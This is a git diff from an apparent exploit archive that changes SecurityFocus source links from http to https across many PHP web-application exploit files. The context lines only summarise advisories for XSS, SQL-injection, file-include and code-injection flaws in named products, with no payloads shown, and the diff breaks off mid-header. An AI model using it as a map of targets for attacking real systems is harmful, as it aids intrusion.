73476f532..6836d423f 100644 --- a/exploits/php/webapps/27391.txt +++ b/exploits/php/webapps/27391.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17050/info +source: https://www.securityfocus.com/bid/17050/info DCP Portal is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27392.txt b/exploits/php/webapps/27392.txt index dd17bc9fa..247bf3f9a 100644 --- a/exploits/php/webapps/27392.txt +++ b/exploits/php/webapps/27392.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17050/info +source: https://www.securityfocus.com/bid/17050/info DCP Portal is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27393.txt b/exploits/php/webapps/27393.txt index 59a69a10d..aa718df73 100644 --- a/exploits/php/webapps/27393.txt +++ b/exploits/php/webapps/27393.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17050/info +source: https://www.securityfocus.com/bid/17050/info DCP Portal is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27394.txt b/exploits/php/webapps/27394.txt index 83c873739..89d4273a8 100644 --- a/exploits/php/webapps/27394.txt +++ b/exploits/php/webapps/27394.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17050/info +source: https://www.securityfocus.com/bid/17050/info DCP Portal is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27395.txt b/exploits/php/webapps/27395.txt index 8c2feba08..0621536a6 100644 --- a/exploits/php/webapps/27395.txt +++ b/exploits/php/webapps/27395.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17050/info +source: https://www.securityfocus.com/bid/17050/info DCP Portal is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27396.txt b/exploits/php/webapps/27396.txt index 5c6b0ec1e..4f0caa85a 100644 --- a/exploits/php/webapps/27396.txt +++ b/exploits/php/webapps/27396.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17054/info +source: https://www.securityfocus.com/bid/17054/info txtForum is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27408.txt b/exploits/php/webapps/27408.txt index 425eac8de..86eddba5e 100644 --- a/exploits/php/webapps/27408.txt +++ b/exploits/php/webapps/27408.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17061/info +source: https://www.securityfocus.com/bid/17061/info txtForum is prone to a remote PHP code-injection vulnerability. diff --git a/exploits/php/webapps/27409.txt b/exploits/php/webapps/27409.txt index 2c207f611..fea02c991 100644 --- a/exploits/php/webapps/27409.txt +++ b/exploits/php/webapps/27409.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17064/info +source: https://www.securityfocus.com/bid/17064/info QwikiWiki is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27410.txt b/exploits/php/webapps/27410.txt index 11465ed87..81163b422 100644 --- a/exploits/php/webapps/27410.txt +++ b/exploits/php/webapps/27410.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17064/info +source: https://www.securityfocus.com/bid/17064/info QwikiWiki is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27411.txt b/exploits/php/webapps/27411.txt index fcdebb3c7..8053b080f 100644 --- a/exploits/php/webapps/27411.txt +++ b/exploits/php/webapps/27411.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17064/info +source: https://www.securityfocus.com/bid/17064/info QwikiWiki is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27412.txt b/exploits/php/webapps/27412.txt index 0b7f1aaf0..b5bd61a3a 100644 --- a/exploits/php/webapps/27412.txt +++ b/exploits/php/webapps/27412.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17064/info +source: https://www.securityfocus.com/bid/17064/info QwikiWiki is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27413.txt b/exploits/php/webapps/27413.txt index 1f6c2e052..d6ae330af 100644 --- a/exploits/php/webapps/27413.txt +++ b/exploits/php/webapps/27413.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17067/info +source: https://www.securityfocus.com/bid/17067/info Core News is prone to a code-execution vulnerability. diff --git a/exploits/php/webapps/27414.txt b/exploits/php/webapps/27414.txt index a047c0b4f..4e5869f8d 100644 --- a/exploits/php/webapps/27414.txt +++ b/exploits/php/webapps/27414.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17073/info +source: https://www.securityfocus.com/bid/17073/info vCard is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27415.txt b/exploits/php/webapps/27415.txt index afff5220b..5d0cecfed 100644 --- a/exploits/php/webapps/27415.txt +++ b/exploits/php/webapps/27415.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17076/info +source: https://www.securityfocus.com/bid/17076/info WMNews is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27416.txt b/exploits/php/webapps/27416.txt index 342c19fb4..ef280fca8 100644 --- a/exploits/php/webapps/27416.txt +++ b/exploits/php/webapps/27416.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17076/info +source: https://www.securityfocus.com/bid/17076/info WMNews is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27417.txt b/exploits/php/webapps/27417.txt index 4074bcf50..03d03d7e5 100644 --- a/exploits/php/webapps/27417.txt +++ b/exploits/php/webapps/27417.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17076/info +source: https://www.securityfocus.com/bid/17076/info WMNews is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27419.txt b/exploits/php/webapps/27419.txt index 8e9f8d267..c54b7b882 100644 --- a/exploits/php/webapps/27419.txt +++ b/exploits/php/webapps/27419.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17079/info +source: https://www.securityfocus.com/bid/17079/info Vegas Forum is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27422.txt b/exploits/php/webapps/27422.txt index 91c600733..e3a6adb3c 100644 --- a/exploits/php/webapps/27422.txt +++ b/exploits/php/webapps/27422.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17107/info +source: https://www.securityfocus.com/bid/17107/info CyBoards PHP Lite is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27423.txt b/exploits/php/webapps/27423.txt index 9def8a5b2..4eb5da169 100644 --- a/exploits/php/webapps/27423.txt +++ b/exploits/php/webapps/27423.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17112/info +source: https://www.securityfocus.com/bid/17112/info DSCounter is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27424.txt b/exploits/php/webapps/27424.txt index 9eae1395c..8f322b44b 100644 --- a/exploits/php/webapps/27424.txt +++ b/exploits/php/webapps/27424.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17116/info +source: https://www.securityfocus.com/bid/17116/info DSDownload is prone to multiple SQL-injection vulnerabilities. The application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/27427.txt b/exploits/php/webapps/27427.txt index 3e5a0540d..6f6a64f67 100644 --- a/exploits/php/webapps/27427.txt +++ b/exploits/php/webapps/27427.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17128/info +source: https://www.securityfocus.com/bid/17128/info Contrexx CMS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27434.txt b/exploits/php/webapps/27434.txt index 3f963b04e..6c8a04d3f 100644 --- a/exploits/php/webapps/27434.txt +++ b/exploits/php/webapps/27434.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17132/info +source: https://www.securityfocus.com/bid/17132/info Oxynews is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27435.txt b/exploits/php/webapps/27435.txt index 45d3e0c48..f08710e1b 100644 --- a/exploits/php/webapps/27435.txt +++ b/exploits/php/webapps/27435.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17142/info +source: https://www.securityfocus.com/bid/17142/info phpMyAdmin is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27436.txt b/exploits/php/webapps/27436.txt index 8eb0faeb6..304ab018b 100644 --- a/exploits/php/webapps/27436.txt +++ b/exploits/php/webapps/27436.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17144/info +source: https://www.securityfocus.com/bid/17144/info Invision Power Board is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27437.txt b/exploits/php/webapps/27437.txt index f2ff123a8..464b0bf05 100644 --- a/exploits/php/webapps/27437.txt +++ b/exploits/php/webapps/27437.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17144/info +source: https://www.securityfocus.com/bid/17144/info Invision Power Board is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27438.txt b/exploits/php/webapps/27438.txt index f517946fd..f5ca4d324 100644 --- a/exploits/php/webapps/27438.txt +++ b/exploits/php/webapps/27438.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17144/info +source: https://www.securityfocus.com/bid/17144/info Invision Power Board is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27439.txt b/exploits/php/webapps/27439.txt index 1960273c3..85c132f39 100644 --- a/exploits/php/webapps/27439.txt +++ b/exploits/php/webapps/27439.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17144/info +source: https://www.securityfocus.com/bid/17144/info Invision Power Board is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27440.txt b/exploits/php/webapps/27440.txt index 8fe1d34b3..f78260f9f 100644 --- a/exploits/php/webapps/27440.txt +++ b/exploits/php/webapps/27440.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17144/info +source: https://www.securityfocus.com/bid/17144/info Invision Power Board is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27441.txt b/exploits/php/webapps/27441.txt index 5b0406e5a..633ee0025 100644 --- a/exploits/php/webapps/27441.txt +++ b/exploits/php/webapps/27441.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17144/info +source: https://www.securityfocus.com/bid/17144/info Invision Power Board is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27442.txt b/exploits/php/webapps/27442.txt index 6124d0e81..e9a1c7790 100644 --- a/exploits/php/webapps/27442.txt +++ b/exploits/php/webapps/27442.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17144/info +source: https://www.securityfocus.com/bid/17144/info Invision Power Board is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27443.txt b/exploits/php/webapps/27443.txt index 442d70284..91fb895b2 100644 --- a/exploits/php/webapps/27443.txt +++ b/exploits/php/webapps/27443.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17146/info +source: https://www.securityfocus.com/bid/17146/info ExtCalendar is prone to four cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27444.txt b/exploits/php/webapps/27444.txt index e313462d3..4692f1874 100644 --- a/exploits/php/webapps/27444.txt +++ b/exploits/php/webapps/27444.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17147/info +source: https://www.securityfocus.com/bid/17147/info Woltlab Burning Board is prone to a cross-site scripting vulnerability. This issue is due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/php/webapps/27445.txt b/exploits/php/webapps/27445.txt index 1cf49b742..0786f2740 100644 --- a/exploits/php/webapps/27445.txt +++ b/exploits/php/webapps/27445.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17149/info +source: https://www.securityfocus.com/bid/17149/info MusicBox is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27446.txt b/exploits/php/webapps/27446.txt index a62ded561..c096c17c2 100644 --- a/exploits/php/webapps/27446.txt +++ b/exploits/php/webapps/27446.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17149/info +source: https://www.securityfocus.com/bid/17149/info MusicBox is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27447.txt b/exploits/php/webapps/27447.txt index 3c188869d..1d25cbefd 100644 --- a/exploits/php/webapps/27447.txt +++ b/exploits/php/webapps/27447.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17149/info +source: https://www.securityfocus.com/bid/17149/info MusicBox is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27448.txt b/exploits/php/webapps/27448.txt index 67b4ac7b8..b4ef08905 100644 --- a/exploits/php/webapps/27448.txt +++ b/exploits/php/webapps/27448.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17150/info +source: https://www.securityfocus.com/bid/17150/info phpWebSite is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/27449.txt b/exploits/php/webapps/27449.txt index 037bffe21..c8f2a60da 100644 --- a/exploits/php/webapps/27449.txt +++ b/exploits/php/webapps/27449.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17150/info +source: https://www.securityfocus.com/bid/17150/info phpWebSite is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/27450.txt b/exploits/php/webapps/27450.txt index 5bfd17040..48e4b9226 100644 --- a/exploits/php/webapps/27450.txt +++ b/exploits/php/webapps/27450.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17153/info +source: https://www.securityfocus.com/bid/17153/info Reportedly, an attacker can carry out directory-traversal attacks. These issues present themselves when the application processes malformed archives. diff --git a/exploits/php/webapps/27454.txt b/exploits/php/webapps/27454.txt index 9ffb7235c..54458ddfc 100644 --- a/exploits/php/webapps/27454.txt +++ b/exploits/php/webapps/27454.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17190/info +source: https://www.securityfocus.com/bid/17190/info Motorola mobile handsets are prone to a dialog-spoofing vulnerability when accepting Bluetooth communications. An attacker could exploit this issue to trick a user into granting them AT access to the device. The attacker could then gather confidential information from the handset. diff --git a/exploits/php/webapps/27458.txt b/exploits/php/webapps/27458.txt index a4121d547..826c5129e 100644 --- a/exploits/php/webapps/27458.txt +++ b/exploits/php/webapps/27458.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17199/info +source: https://www.securityfocus.com/bid/17199/info EasyMoblog is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27459.txt b/exploits/php/webapps/27459.txt index 301966553..e4d2e5ac8 100644 --- a/exploits/php/webapps/27459.txt +++ b/exploits/php/webapps/27459.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17201/info +source: https://www.securityfocus.com/bid/17201/info CoMoblog is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27462.txt b/exploits/php/webapps/27462.txt index 702f7bc3d..5c7a556d4 100644 --- a/exploits/php/webapps/27462.txt +++ b/exploits/php/webapps/27462.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17208/info +source: https://www.securityfocus.com/bid/17208/info AdMan is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27465.txt b/exploits/php/webapps/27465.txt index 3186060ef..001416975 100644 --- a/exploits/php/webapps/27465.txt +++ b/exploits/php/webapps/27465.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17226/info +source: https://www.securityfocus.com/bid/17226/info VihorDesign is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27466.txt b/exploits/php/webapps/27466.txt index 594b5ee87..afa76aab7 100644 --- a/exploits/php/webapps/27466.txt +++ b/exploits/php/webapps/27466.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17227/info +source: https://www.securityfocus.com/bid/17227/info VihorDesign is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27467.txt b/exploits/php/webapps/27467.txt index ee07372c1..401a0c7b4 100644 --- a/exploits/php/webapps/27467.txt +++ b/exploits/php/webapps/27467.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17231/info +source: https://www.securityfocus.com/bid/17231/info ConfTool is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27468.txt b/exploits/php/webapps/27468.txt index 5e802bdac..5a54d72fb 100644 --- a/exploits/php/webapps/27468.txt +++ b/exploits/php/webapps/27468.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17233/info +source: https://www.securityfocus.com/bid/17233/info Nuked-Klan is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27475.txt b/exploits/php/webapps/27475.txt index 4f0c843fd..3a533c0d9 100644 --- a/exploits/php/webapps/27475.txt +++ b/exploits/php/webapps/27475.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17239/info +source: https://www.securityfocus.com/bid/17239/info SaphpLesson is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27477.txt b/exploits/php/webapps/27477.txt index d4f197578..14c2daaaa 100644 --- a/exploits/php/webapps/27477.txt +++ b/exploits/php/webapps/27477.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17247/info +source: https://www.securityfocus.com/bid/17247/info Maian Weblog is prone to multiple SQL-injection vulnerabilities. The application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/27478.txt b/exploits/php/webapps/27478.txt index fbf8fbc9b..237e97cc9 100644 --- a/exploits/php/webapps/27478.txt +++ b/exploits/php/webapps/27478.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17247/info +source: https://www.securityfocus.com/bid/17247/info Maian Weblog is prone to multiple SQL-injection vulnerabilities. The application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/27483.txt b/exploits/php/webapps/27483.txt index 34c26e20d..a6513792d 100644 --- a/exploits/php/webapps/27483.txt +++ b/exploits/php/webapps/27483.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17260/info +source: https://www.securityfocus.com/bid/17260/info Pixel Motion is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27484.txt b/exploits/php/webapps/27484.txt index 4f7ea3d85..c98dd0c2e 100644 --- a/exploits/php/webapps/27484.txt +++ b/exploits/php/webapps/27484.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17260/info +source: https://www.securityfocus.com/bid/17260/info Pixel Motion is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27485.txt b/exploits/php/webapps/27485.txt index 687058fe6..1ea5b09c6 100644 --- a/exploits/php/webapps/27485.txt +++ b/exploits/php/webapps/27485.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17262/info +source: https://www.securityfocus.com/bid/17262/info DSLogin is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27494.txt b/exploits/php/webapps/27494.txt index 7ab528a92..47eecc660 100644 --- a/exploits/php/webapps/27494.txt +++ b/exploits/php/webapps/27494.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17278/info +source: https://www.securityfocus.com/bid/17278/info The 'phpmyfamily' application is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27495.txt b/exploits/php/webapps/27495.txt index 5989d787b..28b9ffcc5 100644 --- a/exploits/php/webapps/27495.txt +++ b/exploits/php/webapps/27495.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17279/info +source: https://www.securityfocus.com/bid/17279/info phpCOIN is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27496.txt b/exploits/php/webapps/27496.txt index f4860599b..b18e7b3f9 100644 --- a/exploits/php/webapps/27496.txt +++ b/exploits/php/webapps/27496.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17279/info +source: https://www.securityfocus.com/bid/17279/info phpCOIN is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27497.txt b/exploits/php/webapps/27497.txt index c7aa2b83d..4db37e61d 100644 --- a/exploits/php/webapps/27497.txt +++ b/exploits/php/webapps/27497.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17282/info +source: https://www.securityfocus.com/bid/17282/info CONTROLzx HMS is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27498.txt b/exploits/php/webapps/27498.txt index c2c419222..5dd87d721 100644 --- a/exploits/php/webapps/27498.txt +++ b/exploits/php/webapps/27498.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17282/info +source: https://www.securityfocus.com/bid/17282/info CONTROLzx HMS is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27499.txt b/exploits/php/webapps/27499.txt index a73dea69e..5bf2da959 100644 --- a/exploits/php/webapps/27499.txt +++ b/exploits/php/webapps/27499.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17282/info +source: https://www.securityfocus.com/bid/17282/info CONTROLzx HMS is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27500.txt b/exploits/php/webapps/27500.txt index a33cfe7a3..6f078267f 100644 --- a/exploits/php/webapps/27500.txt +++ b/exploits/php/webapps/27500.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17285/info +source: https://www.securityfocus.com/bid/17285/info ArabPortal System is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27501.txt b/exploits/php/webapps/27501.txt index c53def30c..f747b6ed0 100644 --- a/exploits/php/webapps/27501.txt +++ b/exploits/php/webapps/27501.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17285/info +source: https://www.securityfocus.com/bid/17285/info ArabPortal System is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27502.txt b/exploits/php/webapps/27502.txt index e26ce1244..d4c07c317 100644 --- a/exploits/php/webapps/27502.txt +++ b/exploits/php/webapps/27502.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17287/info +source: https://www.securityfocus.com/bid/17287/info Connect Daily is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27503.txt b/exploits/php/webapps/27503.txt index 30e2ff746..3d131cfa3 100644 --- a/exploits/php/webapps/27503.txt +++ b/exploits/php/webapps/27503.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17287/info +source: https://www.securityfocus.com/bid/17287/info Connect Daily is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27504.txt b/exploits/php/webapps/27504.txt index 6e401e15d..a496904de 100644 --- a/exploits/php/webapps/27504.txt +++ b/exploits/php/webapps/27504.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17287/info +source: https://www.securityfocus.com/bid/17287/info Connect Daily is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27505.txt b/exploits/php/webapps/27505.txt index 279522aef..6dead789d 100644 --- a/exploits/php/webapps/27505.txt +++ b/exploits/php/webapps/27505.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17287/info +source: https://www.securityfocus.com/bid/17287/info Connect Daily is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27506.txt b/exploits/php/webapps/27506.txt index 7d02879e4..1d07a972c 100644 --- a/exploits/php/webapps/27506.txt +++ b/exploits/php/webapps/27506.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17287/info +source: https://www.securityfocus.com/bid/17287/info Connect Daily is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27507.txt b/exploits/php/webapps/27507.txt index 5faf181cd..7e253c799 100644 --- a/exploits/php/webapps/27507.txt +++ b/exploits/php/webapps/27507.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17289/info +source: https://www.securityfocus.com/bid/17289/info AL-Caricatier is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27509.txt b/exploits/php/webapps/27509.txt index ee84cf65b..55cb6b219 100644 --- a/exploits/php/webapps/27509.txt +++ b/exploits/php/webapps/27509.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17298/info +source: https://www.securityfocus.com/bid/17298/info OneOrZero Helpdesk is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27510.txt b/exploits/php/webapps/27510.txt index 33e12c83a..571f69f05 100644 --- a/exploits/php/webapps/27510.txt +++ b/exploits/php/webapps/27510.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17306/info +source: https://www.securityfocus.com/bid/17306/info PhxContacts is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27511.txt b/exploits/php/webapps/27511.txt index c5d3e764f..bb59f7af1 100644 --- a/exploits/php/webapps/27511.txt +++ b/exploits/php/webapps/27511.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17306/info +source: https://www.securityfocus.com/bid/17306/info PhxContacts is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27512.txt b/exploits/php/webapps/27512.txt index e92d739a6..7f07d2114 100644 --- a/exploits/php/webapps/27512.txt +++ b/exploits/php/webapps/27512.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17307/info +source: https://www.securityfocus.com/bid/17307/info PhxContacts is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/27513.txt b/exploits/php/webapps/27513.txt index 03b606d8c..7a95d53c0 100644 --- a/exploits/php/webapps/27513.txt +++ b/exploits/php/webapps/27513.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17316/info +source: https://www.securityfocus.com/bid/17316/info VNews is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/27533.txt 